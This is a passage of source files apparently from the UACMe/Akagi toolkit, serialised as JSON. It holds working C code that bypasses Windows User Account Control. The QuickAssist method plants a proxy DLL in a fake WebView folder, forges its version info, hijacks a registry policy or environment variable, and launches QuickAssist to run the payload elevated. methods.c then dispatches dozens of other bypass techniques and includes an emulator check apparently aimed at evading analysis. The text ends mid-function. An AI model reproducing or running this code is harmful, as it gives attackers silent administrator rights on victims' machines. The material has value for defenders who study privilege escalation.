supEnumProcessesForSession(NtCurrentPeb()->SessionId,\n (pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);\n\n RtlSecureZeroMemory(&inputs[0], sizeof(inputs));\n\n //\n // Simulate LSHIFT+LCONTROL+LWIN+T.\n //\n\n inputs[0].type = INPUT_KEYBOARD;\n inputs[0].ki.wVk = VK_LSHIFT;\n\n inputs[1].type = INPUT_KEYBOARD;\n inputs[1].ki.wVk = VK_LCONTROL;\n\n inputs[2].type = INPUT_KEYBOARD;\n inputs[2].ki.wVk = VK_LWIN;\n\n inputs[3].type = INPUT_KEYBOARD;\n inputs[3].ki.wVk = 'T';\n\n inputs[4].type = INPUT_KEYBOARD;\n inputs[4].ki.wVk = 'T';\n inputs[4].ki.dwFlags = KEYEVENTF_KEYUP;\n\n inputs[5].type = INPUT_KEYBOARD;\n inputs[5].ki.wVk = VK_LWIN;\n inputs[5].ki.dwFlags = KEYEVENTF_KEYUP;\n\n inputs[6].type = INPUT_KEYBOARD;\n inputs[6].ki.wVk = VK_LCONTROL;\n inputs[6].ki.dwFlags = KEYEVENTF_KEYUP;\n\n inputs[7].type = INPUT_KEYBOARD;\n inputs[7].ki.wVk = VK_LSHIFT;\n inputs[7].ki.dwFlags = KEYEVENTF_KEYUP;\n\n SendInput(8, &inputs[0], sizeof(INPUT));\n\n Sleep(5000);\n\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (fEnvSet)\n supSetEnvVariable(TRUE, T_VOLATILE_ENV, T_SYSTEMROOT, NULL);\n\n if (fDirCreated) {\n DeleteFile(szPayloadDir);\n szPayloadDir[PayloadDirNameLen] = 0;\n RemoveDirectory(szPayloadDir);\n }\n\n return MethodResult;\n}\n\n\n/*\n* ucmxModifyWebviewExecutableFolderPolicy\n*\n* Purpose:\n*\n* Alter WebView BrowserExecutableFolder parameter.\n*\n*/\nBOOLEAN ucmxModifyWebviewExecutableFolderPolicy(\n _In_ LPCWSTR lpPayloadPath\n)\n{\n BOOLEAN bResult = FALSE;\n HKEY hKey = NULL;\n\n if (ERROR_SUCCESS == RegCreateKeyEx(HKEY_CURRENT_USER,\n T_WEBVIEW_POLICY,\n 0, NULL,\n REG_OPTION_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n &hKey,\n NULL))\n {\n bResult = (RegSetValueEx(hKey,\n QUICKASSIST_EXE,\n 0, REG_SZ,\n (const BYTE*)lpPayloadPath,\n ((DWORD)_strlen(lpPayloadPath) * sizeof(WCHAR)) + sizeof(UNICODE_NULL)) == ERROR_SUCCESS);\n\n RegCloseKey(hKey);\n }\n\n return bResult;\n}\n\n/*\n* ucmxRunQuickAssist\n*\n* Purpose:\n*\n* Execute quick assist through direct exe start or protocol.\n*\n*/\nHANDLE ucmxRunQuickAssist()\n{\n WCHAR szBuffer[MAX_PATH * 2];\n SHELLEXECUTEINFO shinfo;\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, QUICKASSIST_EXE);\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n shinfo.lpVerb = NULL;\n shinfo.lpParameters = NULL;\n shinfo.nShow = SW_MINIMIZE;\n\n if (GetFileAttributes(szBuffer) != INVALID_FILE_ATTRIBUTES) {\n shinfo.lpFile = szBuffer;\n }\n else {\n shinfo.lpFile = T_QUICKASSIST;\n }\n\n if (ShellExecuteEx(&shinfo)) {\n return shinfo.hProcess;\n }\n\n return NULL;\n}\n\n/*\n* ucmQuickAssistMethod\n*\n* Purpose:\n*\n* Bypass UAC by environment variables hijack and dll planting.\n* https://github.com/R41N3RZUF477/QuickAssist_UAC_Bypass\n*\n*/\nNTSTATUS ucmQuickAssistMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL fDirCreated = FALSE, fEnvSet = FALSE;\n HANDLE hProcess;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n WCHAR szPayloadPath[MAX_PATH * 2];\n WCHAR szPayloadFile[MAX_PATH * 2];\n\n do {\n\n //\n // Select payload entry point.\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_ENTRYPOINT_QASSIST,\n FALSE))\n {\n break;\n }\n\n //\n // Create destination dir \"EBWebView\\x64\" in %temp%.\n //\n _strcpy(szPayloadPath, g_ctx->szTempDirectory);\n _strcat(szPayloadPath, WEBVIEW_DIR);\n if (!CreateDirectory(szPayloadPath, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n }\n\n _strcat(szPayloadPath, L\"\\\\x64\");\n if (!CreateDirectory(szPayloadPath, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n }\n\n //\n // Drop payload and alter it version info block.\n //\n _strcpy(szPayloadFile, szPayloadPath);\n _strcat(szPayloadFile, TEXT(\"\\\\\"));\n _strcat(szPayloadFile, EMBEDDEDBROWSERWEBVIEW_DLL);\n if (!supWriteBufferToFile(szPayloadFile, ProxyDll, ProxyDllSize))\n break;\n\n fDirCreated = TRUE;\n\n if (!supReplaceVersionInfo(szPayloadFile, (PBYTE)g_webviewvsinfo, sizeof(g_webviewvsinfo), 'qass'))\n break;\n\n //\n // Relay WebView.\n //\n if (!ucmxModifyWebviewExecutableFolderPolicy(szPayloadPath)) {\n fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, g_ctx->szTempDirectory);\n if (fEnvSet == FALSE)\n break;\n }\n\n //\n // Run quick asssist.\n //\n hProcess = ucmxRunQuickAssist();\n if (hProcess == NULL)\n break;\n\n if (WaitForSingleObject(hProcess, 15000) != WAIT_OBJECT_0) {\n TerminateProcess(hProcess, 0);\n CloseHandle(hProcess);\n break;\n }\n CloseHandle(hProcess);\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n supSetGlobalCompletionEvent();\n\n Sleep(1000);\n\n if (fEnvSet)\n supSetEnvVariable(TRUE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, NULL);\n\n if (fDirCreated) {\n _strcpy(szPayloadPath, g_ctx->szTempDirectory);\n _strcat(szPayloadPath, WEBVIEW_DIR);\n supRemoveDirectoryRecursive(szPayloadPath);\n }\n\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/methods.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n* TITLE: METHODS.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* UAC bypass dispatch.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nUCM_API(MethodTest);\nUCM_API(MethodSXS);\nUCM_API(MethodDism);\nUCM_API(MethodWow64Logger);\nUCM_API(MethodUiAccess);\nUCM_API(MethodMsSettings);\nUCM_API(MethodTyranid);\nUCM_API(MethodJunction);\nUCM_API(MethodSXSDccw);\nUCM_API(MethodHakril);\nUCM_API(MethodCorProfiler);\nUCM_API(MethodCMLuaUtil);\nUCM_API(MethodDccwCOM);\nUCM_API(MethodDirectoryMock);\nUCM_API(MethodShellSdctl);\nUCM_API(MethodTokenModUIAccess);\nUCM_API(MethodEditionUpgradeManager);\nUCM_API(MethodDebugObject);\nUCM_API(MethodShellChangePk);\nUCM_API(MethodNICPoison);\nUCM_API(MethodDeprecated);\nUCM_API(MethodIeAddOnInstall);\nUCM_API(MethodWscActionProtocol);\nUCM_API(MethodFwCplLua2);\nUCM_API(MethodProtocolHijack);\nUCM_API(MethodPca);\nUCM_API(MethodCurVer);\nUCM_API(MethodMsdt);\nUCM_API(MethodDotNetSerial);\nUCM_API(MethodVFServerTaskSched);\nUCM_API(MethodVFServerDiagProf);\nUCM_API(MethodIscsiCpl);\nUCM_API(MethodAtlHijack);\nUCM_API(MethodSspiDatagram);\nUCM_API(MethodRequestTrace);\nUCM_API(MethodQuickAssist);\n\nULONG UCM_WIN32_NOT_IMPLEMENTED[] = {\n UacMethodWow64Logger,\n UacMethodEditionUpgradeMgr,\n UacMethodNICPoison,\n UacMethodIeAddOnInstall,\n UacMethodWscActionProtocol,\n UacMethodFwCplLua2,\n UacMethodMsSettingsProtocol,\n UacMethodMsStoreProtocol,\n UacMethodPca,\n UacMethodCurVer,\n UacMethodVFServerTaskSched,\n UacMethodVFServerDiagProf,\n UacMethodAtlHijack,\n UacMethodSspiDatagram,\n UacMethodRequestTrace,\n UacMethodQuickAssist\n};\n\nUCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {\n { MethodTest, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodSXS, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodDism, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodWow64Logger, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodUiAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodMsSettings, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodTyranid, { NT_WIN8_BLUE, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodJunction, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodSXSDccw, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodHakril, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, FALSE, TRUE },\n { MethodCorProfiler, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodCMLuaUtil, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDccwCOM, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDirectoryMock, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodShellSdctl, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodTokenModUIAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodEditionUpgradeManager, { NT_WIN10_REDSTONE1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodDebugObject, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodShellChangePk, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodMsSettings, { NT_WIN10_REDSTONE4, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodIeAddOnInstall, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodWscActionProtocol, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodFwCplLua2, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodProtocolHijack, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },\n { MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n { MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },\n { MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },\n { MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },\n { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },\n { MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n { MethodQuickAssist, { NT_WIN10_REDSTONE5, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }\n};\n\n/*\n* IsMethodImplementedForWin32\n*\n* Purpose:\n*\n* Check if method implemented in win32 version.\n*\n*/\n__forceinline BOOL IsMethodImplementedForWin32(\n _In_ UCM_METHOD Method)\n{\n UINT i;\n for (i = 0; i < RTL_NUMBER_OF(UCM_WIN32_NOT_IMPLEMENTED); i++)\n if (UCM_WIN32_NOT_IMPLEMENTED[i] == (ULONG)Method)\n return FALSE;\n return TRUE;\n}\n\n/*\n* IsMethodMatchRequirements\n*\n* Purpose:\n*\n* Check system requirements of the given method.\n*\n*/\nNTSTATUS IsMethodMatchRequirements(\n _In_ PUCM_API_DISPATCH_ENTRY Entry\n)\n{\n#ifdef _DEBUG\n UNREFERENCED_PARAMETER(Entry);\n#else\n //\n // Check Wow64 flags first. Disable this check for debugging build.\n //\n if (g_ctx->IsWow64) {\n if (Entry->DisallowWow64) {\n return STATUS_NOT_SUPPORTED;\n }\n }\n#ifdef _WIN64\n else {\n //\n // Not required if Win32.\n //\n if (Entry->Win32OrWow64Required != FALSE) {\n return STATUS_NOT_SUPPORTED;\n }\n }\n#endif //_WIN64\n\n //\n // Check availability. Disable this check for debugging build.\n //\n if (g_ctx->dwBuildNumber < Entry->Availability.MinumumWindowsBuildRequired) {\n return STATUS_NOT_SUPPORTED;\n }\n if (g_ctx->dwBuildNumber >= Entry->Availability.MinimumExpectedFixedWindowsBuild) {\n return STATUS_NOT_SUPPORTED;\n }\n#endif\n return STATUS_SUCCESS;\n}\n\n/*\n* PostCleanupAttempt\n*\n* Purpose:\n*\n* Attempt to cleanup left overs.\n*\n*/\nVOID PostCleanupAttempt(\n _In_ UCM_METHOD Method\n)\n{\n switch (Method) {\n\n case UacMethodDISM:\n case UacMethodJunction:\n ucmDismMethodCleanup();\n break;\n\n case UacMethodWow64Logger:\n case UacMethodVFServerDiagProf:\n ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL, NULL);\n break;\n\n case UacMethodSXSConsent:\n ucmSXSMethodCleanup();\n break;\n\n case UacMethodSXSDccw:\n ucmSXSDccwMethodCleanup();\n break;\n\n case UacMethodHakril:\n ucmHakrilMethodCleanup();\n break;\n\n case UacMethodIscsiCpl:\n ucmIscsiCplMethodCleanup();\n break;\n\n case UacMethodAtlHijack:\n ucmMethodCleanupSingleItemSystem32(ATL_DLL, WBEM_DIR);\n break;\n\n default:\n break;\n\n }\n\n ucmConsolePrintValueUlong(TEXT(\"[+] PostCleanupAttempt for method\"), (ULONG)Method, FALSE);\n}\n\n/*\n* MethodsManagerCall\n*\n* Purpose:\n*\n* Run method by method id.\n*\n*/\nNTSTATUS MethodsManagerCall(\n _In_ UCM_METHOD Method\n)\n{\n BOOL bParametersBlockSet = FALSE;\n NTSTATUS MethodResult, Status;\n ULONG PayloadSize = 0, DataSize = 0;\n PVOID PayloadCode = NULL, Resource = NULL;\n PVOID ImageBaseAddress = g_hInstance;\n\n PUCM_API_DISPATCH_ENTRY Entry;\n\n UCM_PARAMS_BLOCK ParamsBlock;\n\n if (wdIsEmulatorPresent3()) {\n return STATUS_NOT_SUPPORTED;\n }\n\n if (Method >= UacMethodMax) {\n return STATUS_INVALID_PARAMETER;\n }\n\n //\n // Is method implemented for Win32?\n //\n#ifndef _WIN64\n if (!IsMethodImplementedForWin32(Method)) {\n return STATUS_NOT_SUPPORTED;\n }\n#endif //_WIN64\n\n#pragma warning(push)\n#pragma warning(disable:33010) //BS disable.\n Entry = &ucmMethodsDispatchTable[Method];\n#pragma warning(pop)\n\n Status = IsMethodMatchRequirements(Entry);\n if (!NT_SUCCESS(Status))\n return Status;\n\n ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Method\"), Method, FALSE);\n ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Entry->PayloadResourceId\"), Entry->PayloadResourceId, TRUE);\n\n if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) {\n\n Status = supLdrQueryResourceDataEx(\n Entry->PayloadResourceId,\n ImageBaseAddress,\n &DataSize,\n &Resource);\n\n if (!NT_SUCCESS(Status)) {\n\n if (Status == STATUS_RESOURCE_TYPE_NOT_FOUND)\n return STATUS_INVALID_IMAGE_FORMAT;\n\n return Status;\n }\n\n if (DataSize == 0 || Resource == NULL) {\n return STATUS_INVALID_IMAGE_FORMAT;\n }\n\n PayloadCode = g_ctx->DecompressRoutine(Entry->PayloadResourceId, Resource, DataSize, &PayloadSize);\n\n if ((PayloadCode == NULL) || (PayloadSize == 0)) {\n return STATUS_DATA_ERROR;\n }\n }\n\n ParamsBlock.Method = Method;\n ParamsBlock.PayloadCode = PayloadCode;\n ParamsBlock.PayloadSize = PayloadSize;\n\n ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Entry->SetParameters\"), Entry->SetParameters, FALSE);\n\n //\n // Set shared parameters.\n //\n // 1. Execution parameters (flag, session id, winstation\\desktop)\n // 2. Optional parameter from Akagi command line.\n //\n if (Entry->SetParameters) {\n bParametersBlockSet = supCreateSharedParametersBlock(g_ctx);\n ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->bParametersBlockSet\"), bParametersBlockSet, FALSE);\n }\n\n MethodResult = Entry->Routine(&ParamsBlock);\n\n if (PayloadCode) {\n RtlSecureZeroMemory(PayloadCode, PayloadSize);\n supVirtualFree(PayloadCode, NULL);\n }\n\n //\n // Wait a little bit for completion.\n //\n if (Entry->SetParameters && bParametersBlockSet) {\n Status = supWaitForGlobalCompletionEvent();\n ucmConsolePrintStatus(TEXT(\"[+] MethodsManagerCall->supWaitForGlobalCompletionEvent\"), Status);\n supDestroySharedParametersBlock(g_ctx);\n }\n\n //\n // Perform method-specific cleanup\n //\n PostCleanupAttempt(Method);\n\n return MethodResult;\n}\n\n/************************************************************\n**\n**\n**\n** Method table wrappers\n**\n**\n**\n************************************************************/\n\nUCM_API(MethodDeprecated)\n{\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n}\n\nUCM_API(MethodTest)\n{\n#ifdef _DEBUG\n return ucmTestRoutine(Parameter->PayloadCode, Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return TRUE;\n#endif\n}\n\nUCM_API(MethodSXS)\n{\n return ucmSXSMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize,\n NULL,\n CONSENT_EXE,\n MSCONFIG_EXE,\n TRUE);\n}\n\nUCM_API(MethodDism)\n{\n return ucmDismMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodWow64Logger)\n{\n //\n // Required x64 as this method abuse wow64 logger mechanism\n //\n#ifdef _WIN64\n return ucmWow64LoggerMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodUiAccess)\n{\n return ucmUiAccessMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodMsSettings)\n{\n LPWSTR lpszPayload = NULL;\n LPWSTR lpszTargetApp = NULL;\n\n WCHAR szTargetApp[MAX_PATH * 2];\n\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n if (Parameter->Method == UacMethodMsSettings2)\n lpszTargetApp = COMPUTERDEFAULTS_EXE;\n else\n lpszTargetApp = FODHELPER_EXE;\n\n _strcpy(szTargetApp, g_ctx->szSystemDirectory);\n _strcat(szTargetApp, lpszTargetApp);\n\n return ucmShellRegModMethod(Parameter->Method,\n T_MSSETTINGS,\n szTargetApp,\n lpszPayload);\n}\n\nUCM_API(MethodTyranid)\n{\n LPWSTR lpszPayload = NULL;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmDiskCleanupEnvironmentVariable(lpszPayload);\n}\n\nUCM_API(MethodJunction)\n{\n return ucmJunctionMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodSXSDccw)\n{\n return ucmSXSDccwMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodHakril)\n{\n return ucmHakrilMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodCorProfiler)\n{\n return ucmCorProfilerMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodCMLuaUtil)\n{\n LPWSTR lpszParameter;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszParameter = g_ctx->szDefaultPayload;\n else\n lpszParameter = g_ctx->szOptionalParameter;\n\n return ucmCMLuaUtilShellExecMethod(lpszParameter);\n}\n\nUCM_API(MethodDccwCOM)\n{\n LPWSTR lpszPayload = NULL;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmDccwCOMMethod(lpszPayload);\n}\n\nUCM_API(MethodDirectoryMock)\n{\n return ucmDirectoryMockMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodShellSdctl)\n{\n LPWSTR Payload = NULL;\n\n if (g_ctx->OptionalParameterLength == 0)\n Payload = g_ctx->szDefaultPayload;\n else\n Payload = g_ctx->szOptionalParameter;\n\n return ucmShellRegModMethod(Parameter->Method,\n T_CLASSESFOLDER,\n SDCLT_EXE,\n Payload);\n}\n\nUCM_API(MethodTokenModUIAccess)\n{\n if (Parameter->Method == UacMethodTokenModUiAccess) {\n return ucmTokenModUIAccessMethod(Parameter->PayloadCode,\n Parameter->PayloadSize);\n }\n else {\n return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,\n Parameter->PayloadSize);\n }\n}\n\nUCM_API(MethodEditionUpgradeManager)\n{\n#ifndef _WIN64\n UNREFERENCED_PARAMETER(Parameter);\n return 